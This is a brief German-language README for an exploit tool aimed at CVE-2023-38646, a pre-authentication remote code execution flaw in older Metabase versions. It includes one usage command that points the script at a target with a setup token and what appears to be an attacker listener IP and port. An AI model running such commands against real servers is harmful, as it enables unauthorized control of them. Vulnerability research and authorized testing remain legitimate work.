
CVE-2023-38646 Pre-Auth RCE in Metabase
Abspaltung von kh4sh3is Repository, die die Notwendigkeit von Burp Collector entfernt.
CVE-2023-38646 (Pre-Auth RCE in Metabase):
Metabase Open Source vor 0.46.6.1 und Metabase Enterprise vor 1.46.6.1 erlauben Angreifern, beliebige Befehle auf dem Server mit den Berechtigungen des Servers auszuführen. Für die Ausnutzung ist keine Authentifizierung erforderlich.
python3 CVE-2023-38646.py -u http://target.com -t 349fa13d-fd94-4d9b-b54f-b4ebf2df682f -i 10.10.15.101 -p 5555
Für weitere Informationen lies diesen Beitrag.